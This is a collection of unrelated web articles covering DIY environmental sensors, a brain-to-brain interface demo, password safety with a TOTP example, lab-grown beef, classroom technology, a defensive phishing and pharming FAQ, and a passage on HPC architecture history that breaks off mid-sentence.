Aramburu studied ecology and environmental science, specifically soil science, at Princeton and later in a Smithsonian research project. His first idea for a business was a sustainable fertilizer funded with the help of a grant from the Bill and Melinda Gates Foundation. In working with fertilizers, researchers needed a way to identify the fertilizer's impact. Soil conducts electricity, and measuring what's going on can tell a lot about soil conditions. Aramburu realized the opportunity.

He started picking up the skills he needed to build a tool for measuring soil conditions, and tapped the expertise of friends. One tool was Arduino, an electronics development platform, which Aramburu said was easy to learn. He got a membership at TechShop, a kind of hacker space for people who want to make things, and took classes in laser cutting and 3D printing. They used a MakerBot Replicator, a desktop 3D printer, to cut some of the initial cases for the product.
They also used another prototyping platform, Electric Imp, for the connectivity capabilities. The Edyn garden sensor has temperature, humidity and light sensors and electrical leads built into the tip, which is inserted into the ground. It has a small micro-computer, is solar powered and uses Wi-Fi. When materials -- water, lime, fertilizer -- are added to the soil, their impact can be measured by how easy or difficult it is to transmit an electric current. From this data, the level of fertilizer, moisture, and acidity in the soil can be determined. There is an independent humidity sensor.

The on-board processor does some initial work, but the data is further processed in a cloud-based environment, which makes recommendations on whether to add water, fertilizer or compost. This system also taps weather data and soil conditions by region and returns recommendations on what to plant and what types of plants to group. There is also a separate valve that can precisely regulate the amount of water.

The arrival of platforms for electronic development, 3D printers and declining prices for sensors is "making it a lot easier to develop hardware," said Aramburu, who compares its increasing simplicity with what's been going on in software. "Software has gotten to the point where you can pick up a language very quickly, even if you have limited computer science experience, and start building an app," he said.

Similarly, Cox used widely available tools to design and build the Flood Beacon. He got the idea when he discovered that one method for checking on flood conditions involved rowing out to markers to record the water height. The Flood Beacon measures water turbulence, via the accelerometer, and water depth with the ultrasonic sensors. The data is sent to Xively, an IoT-specific cloud, and is viewable on a mobile app. It took Cox about a month and a half to produce a working prototype. "We're just kind of really fortunate to live in this world that we do now, where we can make something for 400 (British) pounds or 300 pounds, get it tested and get it working," said Cox.

Patrick Thibodeau covers cloud computing and enterprise applications, outsourcing, government IT policies, data centers and IT workforce issues for Computerworld. Follow Patrick on Twitter at @DCgov or subscribe to Patrick's RSS feed. This story, "A new industrial age is being built on sensors, 3D printing and the cloud" was originally published by Computerworld.
Spock may be exceedingly happy today since the “Vulcan mind meld” is now a reality for humans, thanks to University of Washington researchers who achieved the first noninvasive human brain-to-human brain interface. One researcher sent a brain signal via the Internet and his thoughts controlled the hand movement of a fellow researcher across campus. “The Internet was a way to connect computers, and now it can be a way to connect brains. We want to take the knowledge of a brain and transmit it directly from brain to brain,” said Andrea Stocco whose finger moved on a keyboard in response to his colleague Rajesh Rao’s thoughts. “It was both exciting and eerie to watch an imagined action from my brain get translated into actual action by another brain,” Rao added. “This was basically a one-way flow of information from my brain to his. The next step is having a more equitable two-way conversation directly between the two brains.” On Aug. 12, Rao sat in his lab wearing a cap with electrodes hooked up to an electroencephalography machine, which reads electrical activity in the brain. Stocco was in his lab across campus wearing a purple swim cap marked with the stimulation site for the transcranial magnetic stimulation coil that was placed directly over his left motor cortex, which controls hand movement. The team had a Skype connection set up so the two labs could coordinate, though neither Rao nor Stocco could see the Skype screens. Rao looked at a computer screen and played a simple video game with his mind. When he was supposed to fire a cannon at a target, he imagined moving his right hand (being careful not to actually move his hand), causing a cursor to hit the “fire” button. Almost instantaneously, Stocco, who wore noise-canceling earbuds and wasn’t looking at a computer screen, involuntarily moved his right index finger to push the space bar on the keyboard in front of him, as if firing the cannon. Stocco compared the feeling of his hand moving involuntarily to that of a nervous tic. “We plugged a brain into the most complex computer anyone has ever studied, and that is another brain,” stated Chantel Prat, assistant professor in psychology at the UW’s Institute for Learning & Brain Sciences. She doesn’t want people to freak out and overestimate the technology since, “There’s no possible way the technology that we have could be used on a person unknowingly or without their willing participation.” Although Stocco jokingly called the human brain-to-brain interface a “Vulcan mind meld,” Rao said the technology cannot read a person’s thoughts. It also doesn’t give another person the ability to control your actions against your will; it can only read certain types of simple brain signals. The next experiment will involve sending more complex thoughts to another brain. If successful, then they plan to conduct experiments “on a larger pool of subjects.” Before this successful human-to-human brain interfacing demonstration, a first of its kind, Duke University researchers established a “brain-to-brain communication between two rats” and Harvard researchers were able to show brain-to-brain communication between a human and a rat. Examples of how direct brain-to-brain communication in humans might be used in the future include helping a person with disabilities “communicate his or her wish, say, for food or water. 
The brain signals from one person to another would work even if they didn’t speak the same language.” Or if a pilot were to become incapacitated, then someone on the ground could send human brain-to-brain signals to assist a flight attendant or passenger in landing an airplane.
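As a heavily simplified, hypothetical illustration of the one-way pipeline described above (EEG feature detection on the sender's side, a network trigger on the receiver's side), the sketch below computes power in the mu band from a window of single-channel EEG samples and sends a small UDP message when a large drop, the kind of desynchronization associated with imagined hand movement, is detected. All of the parameters (sampling rate, band limits, threshold) are placeholder values, and the actual UW system involved far more than this.

```python
import socket
import numpy as np

FS = 256                  # assumed sampling rate, in Hz
MU_BAND = (8.0, 12.0)     # mu rhythm band over the motor cortex, in Hz

def mu_band_power(window: np.ndarray) -> float:
    """Average spectral power in the mu band for one window of EEG samples."""
    spectrum = np.abs(np.fft.rfft(window * np.hanning(len(window)))) ** 2
    freqs = np.fft.rfftfreq(len(window), d=1.0 / FS)
    in_band = (freqs >= MU_BAND[0]) & (freqs <= MU_BAND[1])
    return float(spectrum[in_band].mean())

def maybe_send_trigger(window, baseline_power, sock, addr, ratio=0.5) -> bool:
    """Send a 'fire' trigger when mu power drops well below its resting baseline.

    Imagined hand movement suppresses the mu rhythm, so a large drop relative to
    baseline is treated as the intent to act; the receiving computer would then
    drive whatever effector it controls (in the UW demo, a magnetic stimulator).
    """
    if mu_band_power(window) < ratio * baseline_power:
        sock.sendto(b"FIRE", addr)
        return True
    return False

if __name__ == "__main__":
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    rng = np.random.default_rng(0)
    fake_window = rng.normal(size=FS)   # one second of synthetic "EEG"
    sent = maybe_send_trigger(fake_window, baseline_power=1.0,
                              sock=sock, addr=("127.0.0.1", 9999))
    print("trigger sent" if sent else "no trigger")
```

Even this toy version shows why the researchers stress that only simple, voluntarily produced signals can be read: the sender has to deliberately generate a detectable change, and the receiver only ever gets a coarse trigger, not a thought.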
One important key to protecting yourself online is to make sure no one steals your username and password. Stolen passwords are at the root of the problem with online banking security, and Internet security overall. Anyone who has your password can access your accounts the same way that you do. That is why a second authentication factor, something you have, is such a strong security measure. A would-be criminal has to steal something physical from you, as well as your password, to commit an online fraud. Until you can get two-factor authentication, here are the top eight rules:

1. Always make sure you are at the site you want. See: If the Internet is secure, why are there Internet security problems?
2. Don't click on a link in an email. See: How does phishing work?
3. Try to use a browser security bar.
4. Protect yourself against phishing. See: What is the best way to prevent phishing?
5. Protect yourself against keyboard logging. See: What is a keystroke monitor?
6. Don't store passwords on your PC if anyone else can get to it.
7. Don't put your passwords in a file on your PC.
8. Don't write down your passwords if you can avoid it, or hide them really, really well.
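To illustrate why the "something you have" factor mentioned above is so effective, here is a minimal sketch of a time-based one-time password (TOTP), the mechanism behind many authenticator apps and hardware tokens. This is a generic RFC 6238-style example, not tied to any particular bank's system: the code changes every 30 seconds and is derived from a secret stored on the device, so a stolen password alone is not enough to log in.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Compute the current time-based one-time password for a base32-encoded secret."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // interval              # 30-second time step
    msg = struct.pack(">Q", counter)                    # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

if __name__ == "__main__":
    # Example shared secret; in practice it is provisioned once (for instance via a
    # QR code) and then lives only on the user's device or hardware token.
    print(totp("JBSWY3DPEHPK3PXP"))
```

Because the attacker would need both the password and the device holding the secret, phishing a password on its own no longer opens the account.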
In Vitro Beef: It's What's for Dinner? Scientists unveiled the world's first lab-grown hamburger at a press event in London on Monday, showcasing a patty made from stem cells -- a technique that could help alleviate the growing demand for more sustainable beef products. Mark Post, a scientist at Maastricht University, spent about two years developing the process for making in vitro, or cultured, meat products. Post used stem cells taken harmlessly from the shoulder muscle of cows to create the 5 oz. burger that debuted Monday. Post placed the stem cells in petri dishes, where they multiplied and merged into strands. About 20,000 of the strands were required to create one burger. On a larger scale, one sample of cells would be enough to produce as much as 20,000 tons of lab-grown meat, Post said. He used the event Monday to highlight the need for alternative meat products, noting that global meat production is a large contributor to greenhouse gas emissions and other environmental pressures. The research project cost about US$332,000 and was funded by Google cofounder Sergey Brin, who shares Post's concerns about developing sustainable meat products. Bumps in the Road Several hurdles will have to be overcome in the production of cultured meat products, Post said, and it could be two decades or more before it becomes a staple on the dinner table. Cost and taste are the two primary concerns. Even if in vitro meat production were scaled up, the product could cost about $30 per pound, the researchers noted Monday. As for flavor, the lack of fat in the lab-grown burger makes the texture less juicy than a natural burger, Post acknowledged. Beyond the technical and economic concerns, there is the question of public reaction to burgers that have been produced inside a lab, said Braden Allenby, professor of engineering and ethics at Arizona State University. "There are obviously some critical steps -- getting the cost down, determining how serious cultural aversion to factory meat might be, how strong the opposition is from agricultural interests, figuring out whether factory meat is a niche luxury food or an expensive commodity product -- and how those play out will have a lot to do with the time frames involved," he told TechNewsWorld. Another hurdle for any food product made for the mass market is the rigorous safety testing it must pass, said James Tillotson, professor of food policy and international business at Tufts University. "There are a lot of safety issues here," he told TechNewsWorld. "You're going to have to figure out how to control certain microorganisms from growing on this -- not just in the lab, but also if you're packaging and shipping the food. And you also have to look at the long-term effects of eating synthetic products. That's a lot of testing." Tinkering Away at Burgers That testing might be a few steps closer to taking place, though, said Allenby. Following Monday's event and the buzz that Post's in vitro burger has received -- including his urging for more funded research -- cultured meat may have earned a few more followers. "Synthetic meat research is badly underfunded at this point, in part because it is viewed as a high-tech fantasy rather than a serious potential environmental technology," he pointed out. "Now that there's a well-publicized proof of principle, it is likely that activity will accelerate. If and when it becomes apparent that this might be a commercially viable product, it will be interesting to see how the large agricultural firms begin responding."
<urn:uuid:4f0e190f-9583-4915-beaa-6b944bdb0f22>
CC-MAIN-2017-09
http://www.linuxinsider.com/story/science/78653.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171043.28/warc/CC-MAIN-20170219104611-00229-ip-10-171-10-108.ec2.internal.warc.gz
en
0.967964
728
2.71875
3
Chromebooks, iPads, Edmodo, network printers, USB drives, Androids, cloud storage, Prezi, virtual reality, LCD projectors and apps. The vocabulary words above that were at one time nonexistent now fill the conversations of educators and students today. Technology is now at the heart of the classroom experience, but it can be the bane of a teacher’s existence. If he or she needs to capture students’ attention and ensure they have mastered core concepts, then Chromebooks and apps can get in the way. Teaching can be a frustrating and challenging occupation all by itself. Adding in all of those gadgets and gizmos can be totally overwhelming at times. Despite the headaches, there is no denying that technology has brought some wonderful positives into the classroom. So raise your SMART board remotes, smile at your dual monitors and give three cheers for these reasons to be thankful for technology in the classroom: Thank you technology… for new teaching tools. Teaching tools have come such a long way over the years. Imagine trying to illustrate a scientific experiment with only chalk and a chalkboard or teaching a new concept without an updated textbook. Remember filmstrips, mimeographs and slide projectors? Teachers used to have to wait years to get new tools in their classrooms. But now that we have the Internet with free applications that download in seconds, we can change our lessons and activities on the fly. Have a kid that just isn’t getting it? Just Google a new tool to teach in a different way. Check out “The Evolution of Classroom Technology” by Edudemic here for a little teaching nostalgia. Thank you technology… for time savings. Speaking of changing up a lesson plan: With Internet tech at their fingertips, teachers can save so much time planning by looking for other lessons online. Technological resources like screen sharing between student and teacher computers can get students to the right place in an online textbook quickly and easily. Cloud storage resources, such as Google Drive, allow teachers to access files ASAP instead of searching through a file cabinet for an old lesson. Need a quick video to help illustrate a concept? Youtube it! For years, teachers had to present the same lessons with the same activities over and over because it took so much time to change anything. Now, we have a zillion resources at our fingertips to find new ideas or concepts to make our own. Thank you technology… for better communication. Before we had technology that informed parents about their kids’ grades, the message was delivered in a note sent home in a backpack. Inevitably, a mischievous student would “lose” the note and keep the parent uninformed of what was going on in class. Now, there is email. A teacher can send a note to a parent any time during the day and inform him or her of everything going on in class. Because of technology, teachers can now communicate with students more easily, too. Apps like Edmodo allow teachers and students to connect on the Internet from anywhere. The Remind app lets teachers send safe text message reminders to students about tests, permission slips or upcoming events. Network monitoring software allows teachers and students to instant message each other through their laptops and desktop computers in classrooms so that questions can be asked privately without disrupting class. Because of technology, students and teachers are more connected and communicative than ever. Thank you technology… for fun! 
As stated in the introduction, technology in classrooms can be frustrating. But it also can be so much fun! How cool is it that we can project a live view of the Eiffel Tower onto a huge screen in our classrooms because of Google Earth? We can now have a lively game of educational Jeopardy by using smart phones as clickers. We can give kids a virtual reality experience of climbing Mount Everest. Thanks to technology, we are able to show students how vast and amazing the world is. We can open their eyes to new experiences and give them the tools to educate themselves. We can instill the excitement of discovery by providing fun ways of learning. Thanks technology, for making learning FUN! This Thanksgiving, Impero Software would like to thank all of our clients for believing in our software solution and for supporting our business. We appreciate you.
<urn:uuid:551b1a3e-c19e-4aba-a7ac-a5ad3ca00298>
CC-MAIN-2017-09
https://www.imperosoftware.com/4-reasons-to-be-thankful-for-technology-in-the-classroom/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00050-ip-10-171-10-108.ec2.internal.warc.gz
en
0.943654
885
3.03125
3
Phishing is a method of trying to gather personal information using deceptive e-mails and websites. Pharming also aims to collect personal information from unsuspecting victims by essentially tinkering with the road maps that computers use to navigate the Web. You don't want either one working its evil genius on you, your employees or your customers. Here's how to be on your guard against both phishing and pharming. Last updated: April 2009
- What is phishing?
- Can we prevent phishing attacks?
- What can my company do to reduce our chances of being targeted?
- What plans should my company have in place before a phishing incident occurs?
- How can we quickly find out if a phishing attack has been launched using our company's name?
- How can we help our customers avoid falling for phishing?
- If an attack does happen, how should we respond?
- Any legal/regulatory requirements we should be aware of?
- What action can we take against the phishers themselves?
- How might phishing attacks evolve in the near future? (E.g. "spear-phishing")
- How can we guard against pharming attacks?

Q: What is phishing?
A: Phishing is a method of trying to gather personal information using deceptive e-mails and websites. Typically, a phisher sends an e-mail disguised as a legitimate business request. For example, the phisher may pass himself off as a real bank asking its customers to verify financial data. (So phishing is a form of "social engineering".) The e-mail is often forged so that it appears to come from a real e-mail address used for legitimate company business, and it usually includes a link to a website that looks exactly like the bank's website. However, the site is bogus, and when the victim types in passwords or other sensitive information, that data is captured by the phisher. The information may be used to commit various forms of fraud and identity theft, ranging from compromising a single existing bank account to setting up multiple new ones. Early phishing attempts were crude, with telltale misspellings and poor grammar. Since then, however, phishing e-mails have become remarkably sophisticated. Phishers may pull language straight from official company correspondence and take pains to avoid typos. The fake sites may be near-replicas of the sites phishers are spoofing, containing the company's logo and other images and fake status bars that give the site the appearance of security. Phishers may register plausible-looking domains like aolaccountupdate.com, mycitibank.net or paypa1.com (using the number 1 instead of the letter L). They may even direct their victims to a well-known company's actual website and then collect their personal data through a faux pop-up window.

Can we prevent phishing attacks?
Companies can reduce the odds of being targeted, and they can reduce the damage that phishers can do (more details on how below). But they can't really prevent it. One reason phishing e-mails are so convincing is that most of them have forged "from" lines, so that the message looks like it's from the spoofed company. There's no way for an organization to keep someone from spoofing a "from" line and making it seem as if an e-mail came from the organization. A technology known as sender authentication does hold some promise for limiting phishing attacks, though.
The idea is that if e-mail gateways could verify that messages purporting to be from, say, Citibank did in fact originate from a legitimate Citibank server, messages from spoofed addresses could be automatically tagged as fraudulent and thus weeded out. (Before delivering a message, an ISP would compare the IP address of the server sending the message to a list of valid addresses for the sending domain, much the same way an ISP looks up the IP address of a domain to send a message. It would be sort of an Internet version of caller ID and call blocking.) Although the concept is straightforward, implementation has been slow because the major Internet players have different ideas about how to tackle the problem. It may be years before different groups iron out the details and implement a standard. Even then, there's no way of guaranteeing that phishers won't find ways around the system (just as some fraudsters can fake the numbers that appear in caller IDs). That's why, in the meantime, so many organizations—and a growing marketplace of service providers—have taken matters into their own hands. What can my company do to reduce our chances of being targeted by phishing attacks? In part, the answer has to do with NOT doing silly or thoughtless things that can increase your vulnerability. Now that phishing has become a fact of life, companies need to be careful about how they use e-mail to communicate with customers. For example, in May 2004, Wachovia's phones started ringing off the hook after the bank sent customers an e-mail instructing them to update their online banking user names and passwords by clicking on a link. Although the e-mail was legitimate (the bank had to migrate customers to a new system following a merger), a quarter of the recipients questioned it. As Wachovia learned, companies need to clearly think through their customer communication protocols. Best practices include giving all e-mails and webpages a consistent look and feel, greeting customers by first and last name in e-mails, and never asking for personal or account data through e-mail. If any time-sensitive personal information is sent through e-mail, it has to be encrypted. Marketers may wring their hands at the prospect of not sending customers links that would take them directly to targeted offers, but instructing customers to bookmark key pages or linking to special offers from the homepage is a lot more secure. That way, companies are training their customers not to be duped. It also makes sense to revisit what customers are allowed to do on your website. They should not be able to open a new account, sign up for a credit card or change their address online with just a password. At a minimum, companies should acknowledge every online transaction through e-mail and one other method of the customer's choosing (such as calling the phone number on record) so that customers are aware of all online activity on their accounts. And to make it more difficult for phishers to copy online data-capture forms, organizations should avoid putting them on the website for all to see. Instead, organizations should require secured log-in to access e-commerce forms. At the end of the day, though, better authentication is the best way to decrease the likelihood that phishers will target your organization. Banks are beginning to experiment with technologies like RSA tokens, biometrics, one-time-use passwords and smart cards, all of which make their customers' personal information less valuable for phishers. 
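As a rough illustration of the sender-authentication idea described above, the sketch below performs a simplified SPF-style check: it looks up the domain's published list of permitted sending addresses in DNS and compares a connecting server's IP address against it. It is a toy rather than a full SPF/DKIM/DMARC implementation; the use of the third-party dnspython package and the example domain and address are assumptions.

```python
# Illustrative sketch only: a simplified SPF-style check of the kind described
# above. Real mail gateways use complete SPF/DKIM/DMARC implementations.
import ipaddress
import dns.resolver  # third-party package "dnspython"

def sender_ip_allowed(sending_ip: str, claimed_domain: str) -> bool:
    """Return True if claimed_domain's published SPF record lists sending_ip."""
    answers = dns.resolver.resolve(claimed_domain, "TXT")
    for record in answers:
        txt = b"".join(record.strings).decode()
        if not txt.startswith("v=spf1"):
            continue  # not the SPF record
        for token in txt.split():
            if token.startswith("ip4:"):
                network = ipaddress.ip_network(token[4:], strict=False)
                if ipaddress.ip_address(sending_ip) in network:
                    return True
    return False

# A gateway applying this check would tag or quarantine mail whose source
# address fails it, e.g.: sender_ip_allowed("203.0.113.7", "examplebank.com")
```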
One midsized bank was able to cut its phishing-related ATM card losses by changing its authentication process. Every ATM card has data encoded on its magnetic strip that the customer can't see but that most ATM machines can read. The bank worked with its network provider to use that hidden information to authenticate ATM transactions—an important step that, according to Gartner, only about half of U.S. banks had taken by mid-2005. "Since the number isn't printed on the back of the card, customers can't accidentally disclose it," the bank's CISO explained. The information was already in the cards, so the bank didn't have to go through an expensive process of reissuing cards. "It was a very economical solution, and it's been very effective," said the CISO. What plans should my company have in place before a phishing incident occurs? Before your organization becomes a target, establish a cross-functional anti-phishing team and develop a response plan so that you're ready to deal with any attack. Ideally, the team should include representatives from IT, internal audit, communications, PR, marketing, the Web group, customer service and legal services. This team will have to answer some hard questions, such as: * Where should the public send suspicious e-mails involving your brand? Set up a dedicated e-mail account, such as email@example.com, and monitor it closely. * What should call center staff do if they hear a report of a phishing attack? Make sure that employees are trained to recognize the signs of a phishing attack and know what to tell and ask a customer who may have fallen for a scam. * How and when will your organization notify customers that an attack has occurred? You might opt to post news of new phishing e-mails targeting your company on your website, reiterating that they are not from you and that you didn't and won't ask for such information. * Who will take down a phishing site? Larger companies often keep this activity in-house; smaller companies may want to outsource. - If you keep the shut-down service in-house, a good response plan should outline whom to contact at the various ISPs to get a phisher site shut down as quickly as possible. Also, identifying law enforcement contacts at the FBI and the Secret Service ahead of time will improve your chances of bringing the perpetrator to justice. - If a vendor is used, decide what the vendor can do on your behalf. You may want to authorize representatives to send e-mails and make phone calls, but have your legal department handle any correspondence involving legal action. * When will the company take action against a phishing site, such as feeding it inaccurate information or exploiting vulnerabilities in its coding? Talk out the many pros and cons beforehand. * How far will you go to protect customers? Decide how much information about identity theft you'll give to customers who fall for a scam, and how this information will be delivered. You should also talk through scenarios in which you will monitor or close and re-open affected accounts. * Are you inadvertently training your customers to fall for phishing scams? Educate the sales and marketing teams about characteristics of phishing e-mails. Then, make sure legitimate e-mails don't set off any alarms. How can we quickly find out if a phishing attack has been launched using our company's name? Sometimes a new phish announces itself violently, as an organization's e-mail servers get pummeled with phishing e-mails that are bouncing back to their apparent originator. 
There are other ways to learn about an attack, though—either before or after it occurs.
a) Monitor for fraudulent domain name registrations. Phishers often set up the fake sites several days before sending out phishing e-mails. One way to stop them from swindling your customers is to find and shut down these phishing sites before phishers launch their e-mail campaigns. You can outsource the search to a fraud alert service. These services use technologies that scour the Web looking for unauthorized uses of your logo or newly registered domains that contain your company's name, either of which might be an indication of an impending phishing attack. This will give your company time to counteract the strike (more on that later).
b) Set up a central inbox. The easiest and most effective way to find out if your organization is being targeted by phishers is simply by giving the general public a way to report phishing attacks. To do this, organizations typically set up one e-mail address where all suspected phishing e-mails are directed, with an address such as firstname.lastname@example.org or email@example.com. Ideally, this central inbox should be monitored 24/7. "It's your customers and noncustomers who are going to be the ones that tell you that the phish is out there," said one security manager interviewed for a case study published in CSO.
c) Watch your Web traffic. SANS's Internet Storm Center recommends that by examining Web traffic logs and looking for spikes in referrals from specific, heretofore unknown IP addresses, CSOs may be able to zero in on sites used for large-scale phishing attacks. After gathering victims' information, many phishing sites then redirect the victim to a log-in page on the real website the phisher is spoofing.
d) Hire a firm to help. The same companies that scan the Internet for unauthorized uses of your logo can also monitor for active phishing sites. For example, Toronto-based Brandimensions hosts a vast, interconnected network of domain names and e-mail addresses intended solely to attract phishing e-mails and other spam. They're called honeypots. Entire websites are built to publish e-mail addresses, point to one another, and thereby attract the attention of automated Web crawlers that compile spam lists. The company then uses "relevancy detection software" to flag the e-mails that could be most damaging to its customers.

How can we help our customers avoid falling for phishing?
People who know about phishing stand a better chance of resisting the bait. "The best defense is that a consumer has heard of phishing and is unlikely to respond," says Patricia Poss, an attorney with the Bureau of Consumer Protection at the Federal Trade Commission. Consumers must be trained to think twice about replying to any e-mail or pop-up that requests personal information.
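A minimal sketch of the "monitor for fraudulent domain name registrations" idea in (a) above: generate a few crude lookalike spellings of a brand's domain and check whether any of them currently resolve in DNS. Commercial fraud-alert services are far more thorough; the brand name, character substitutions and suffixes here are illustrative placeholders.

```python
# Crude lookalike-domain monitor, for illustration only.
import socket

SUBSTITUTIONS = {"l": "1", "o": "0", "i": "1", "e": "3"}

def lookalike_domains(brand: str, tld: str = ".com"):
    """Yield a few plausible spoofed spellings of a brand's domain."""
    for i, ch in enumerate(brand):
        if ch in SUBSTITUTIONS:
            yield brand[:i] + SUBSTITUTIONS[ch] + brand[i + 1:] + tld
    for suffix in ("-update", "-account", "-secure"):
        yield brand + suffix + tld

def currently_resolves(domain: str) -> bool:
    """A domain that resolves has probably been registered and pointed somewhere."""
    try:
        socket.gethostbyname(domain)
        return True
    except socket.gaierror:
        return False

for candidate in lookalike_domains("examplebank"):
    if currently_resolves(candidate):
        print("possible phishing domain registered:", candidate)
```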
<urn:uuid:0b4119f6-5309-4502-81ce-11eab5a68e80>
CC-MAIN-2017-09
http://www.csoonline.com/article/2117843/identity-theft-prevention/phishing--the-basics.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170569.99/warc/CC-MAIN-20170219104610-00226-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955542
2,779
2.890625
3
Millions of people are visually impaired and must use assistive technology (AT) to read electronic content. Assistive technology software of this kind is commonly called a screen reader. To ensure equal access to information, the US Congress enacted legislation in 1998 requiring U.S. Federal agencies and contractors to procure accessible software and to produce accessible electronic documents. The regulations, known as Section 508, went into effect in June 2001. Section 508 ensures content is tagged in the correct order and that section headings, bulleted and numbered lists, and footnotes and endnotes are properly identified. The Appligent accessibility group has put together a document containing a useful set of guidelines to follow when creating documents which need to be made accessible and Section 508 compliant. The "PDF Creation Best Practices" document talks about the following:
- Fonts and Bullets
- Formatting Issues
- Formatting Issues Specific to Microsoft Word
Taking the time to follow these simple guidelines can save your organization a lot of time and money when preparing an accessible document. The web page can be found here: PDF Creation Best Practices
<urn:uuid:63375ad5-7519-4005-9297-7e762bef07dd>
CC-MAIN-2017-09
https://labs.appligent.com/pdfblog/creating-section-508-friendly-documents/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00154-ip-10-171-10-108.ec2.internal.warc.gz
en
0.887315
222
2.875
3
The chronology of high performance computing can be divided into “ages” based on the predominant systems architectures for the period. Starting in the late 1970s vector processors dominated HPC. By the end of the next decade massively parallel processors were able to make a play for market leader. For the last half of the 1990s, RISC based SMPs were the leading technology. And finally, clustered x86 based servers captured market priority in the early part of this century. This architectural path was dictated by the technical and economic effect of Moore’s Law. Specifically, the doubling of processor clock speed every 18 to 24 months meant that without doing anything, applications also roughly doubled in speed at the same rate. One effect of this “free ride” was to drive companies attempting to create new HPC architectures from the market. Development cycles for new technology simply could not outpace Moore’s Law-driven gains in commodity technology, and product development costs for specialized systems could not compete against products sold to volume markets. The more general-purpose systems were admittedly not the best architectures for HPC users’ problems. However commodity component based computers were inexpensive, could be racked and stacked, and were continually getting faster. In addition, users could attempt to parallelize their applications across multiple compute nodes to get additional speed ups. In a recent Intersect360 study, users reported a wide range of scalable applications, with some using over 10,000 cores, but with the median number of cores used by a typical HPC application of only 36 cores. In the mid 2000s, Moore’s Law went through a major course correction. While the number of transistors on a chip continued to double on schedule, the ability to increase clock speed hit a practical barrier — “the power wall.” The exponential increase in power required to increase processor cycle times hit practical cost and design limits. The power wall led to clock speeds stabilizing at roughly 3GHz and multiple processor cores being placed on a single chip with core counts now ranging from 2 to 16. This ended the free ride for HPC users based on ever faster single-core processors and is forcing them to rewrite applications for parallelism. In addition to the power wall, the scale out strategy of adding capacity by simply racking and stacking more compute server nodes caused some users to hit other walls, specifically the computer room wall (or “wall wall”) where facilities issues became a major problem. These include physical space, structural support for high density configurations, cooling, and getting enough electricity into the building. The market is currently looking to a combination of four strategies to increase the performance of HPC systems and applications: parallel applications development; adding accelerators to standard commodity compute nodes; developing new purpose-built systems; and waiting for a technology breakthrough. Parallelism is like the “little girl with the curl,” when parallelism is good it is very, very good, and when it is bad it is horrid. Very good parallel applications (aka embarrassingly parallel) fall into such categories as: signal processing, Monte Carlo analysis, image rendering, and the TOP500 benchmark. The success of these areas can obscure the difficulty in developing parallel applications in other areas. 
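To make the Monte Carlo category just mentioned concrete, here is a minimal, illustrative Python sketch (the core count and sample sizes are arbitrary): each worker estimates pi from its own random samples, and no communication is needed until the final one-line reduction.

```python
# Minimal embarrassingly parallel example: Monte Carlo estimation of pi.
import random
from multiprocessing import Pool

def count_hits(samples: int) -> int:
    """Count random points that fall inside the unit quarter-circle."""
    rng = random.Random()
    hits = 0
    for _ in range(samples):
        x, y = rng.random(), rng.random()
        if x * x + y * y <= 1.0:
            hits += 1
    return hits

if __name__ == "__main__":
    workers, samples_per_worker = 8, 1_000_000
    with Pool(workers) as pool:
        # Each sub-problem runs independently; results are combined only at the end.
        hits = pool.map(count_hits, [samples_per_worker] * workers)
    pi_estimate = 4.0 * sum(hits) / (workers * samples_per_worker)
    print(pi_estimate)
```

Workloads like this scale almost linearly because the workers never have to talk to one another, which is the defining trait spelled out below.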
Embarrassingly parallel applications have a few characteristics in common:
- The problem can be broken up into a large number of sub-problems.
- These sub-problems are independent of one another; that is, they can be solved in any order and without requiring any data transfer to or from other sub-problems.
- The sub-problems are small enough to be effectively solved on whatever the compute node du jour might be.
When these constraints break down, the programming problem first becomes interesting, then challenging, then maddening, then virtually impossible. The programmer must manage ever more complex data traffic patterns between sub-problems, plus control the order of operations of various tasks, plus attempt to find ways to break larger sub-problems into sub-sub-problems, and so on. If this were easy it would have been done long ago.
Adding accelerators to standard computer architectures is a technique that has been used throughout the history of computer architecture development. Current HPC markets are experimenting with graphics processing units (GPUs) and, to a lesser extent, field programmable gate arrays (FPGAs). GPUs have long been a standard component in desktop computers. GPUs are of interest for several reasons: they are inexpensive commodity components, they have fast independent memories, and they provide significant parallel computational power. FPGAs are standard devices long in use within the electronics industry for quickly developing and fielding specialty chips that are often replaced in products by standard ASICs over time. FPGAs allow HPC users to essentially customize the computer to the requirements of their applications. In addition, they should benefit from Moore's Law advancements over time.
Challenges for accelerator-based systems stem from a single program being run over two different processing devices, one a general-purpose processor with limited speed, and the other an accelerator with high processing speed but limited overall functionality. Challenges fall into three major areas:
- Programming — Computers can be built to arbitrarily high levels of complexity, however the average complexity of computer programmers remains a constant. Accelerators add two levels of complexity to applications development: first, writing a single program that is divided between two different processor types, and second, writing a program that can take advantage of the specific characteristics of the accelerator.
- Control and communications — Performance gains from acceleration can be diminished or lost through compute overhead generated by setting up the problem on the accelerator, moving data between the standard processor and the accelerator, and coordinating the operations of both compute units.
- Data management — Programming complexity is increased and performance is reduced in cases where the standard processor and accelerator use separate independent memories. Issues for managing data across multiple processors range from determining proper data decomposition, to efficiently moving data in and out of the proper memories, to stalling processes while waiting on data from another memory, to debugging programs where it is unclear which processor has last modified a data item.
Many of these issues are associated with parallel computing in general; however, they are still significant for accelerator-based operations, and the close coupling between the processor and the accelerator may require programmers to have a deep understanding of the behavior of the physical hardware components.
Purpose-built systems are systems that are designed to meet the requirements of HPC workflows. (These systems were initially called supercomputers.) In today's market, new HPC architectures still make use of commodity components such as processor chips, memory chips/DIMMs, accelerators, I/O ports, and so on. However, they introduce novel technologies in such areas as:
